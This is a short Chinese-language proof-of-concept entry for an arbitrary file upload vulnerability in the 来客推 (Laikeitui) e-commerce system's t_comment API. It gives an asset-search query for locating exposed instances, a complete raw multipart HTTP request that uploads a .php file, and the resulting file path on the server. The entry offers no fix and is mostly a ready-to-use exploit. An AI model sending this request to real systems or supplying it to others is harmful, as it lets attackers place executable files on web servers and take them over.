来客推电商系统t_comment存在任意文件上传漏洞
一、漏洞简介
来客推电商在消费品的分销、零售流领域,沉淀了多种类型商业模式的解决方案,如B2C、B2B2C、020、新零售、社交电商、跨境电商、S2b2c等。来客推电商系统t_comment存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本
- 来客推电商系统
三、资产测绘
- hunter
app.name="来客推" - 特征
四、漏洞复现
POST /LKT/index.php?module=api&action=product&m=t_comment HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 226
--00content0boundary00
Content-Disposition: form-data; name="type"
file
--00content0boundary00
Content-Disposition: form-data; name="imgFile"; filename="1.php"
Content-Type: image/php
123
--00content0boundary00--
上传文件位置
/LKT/images/1712736482605.php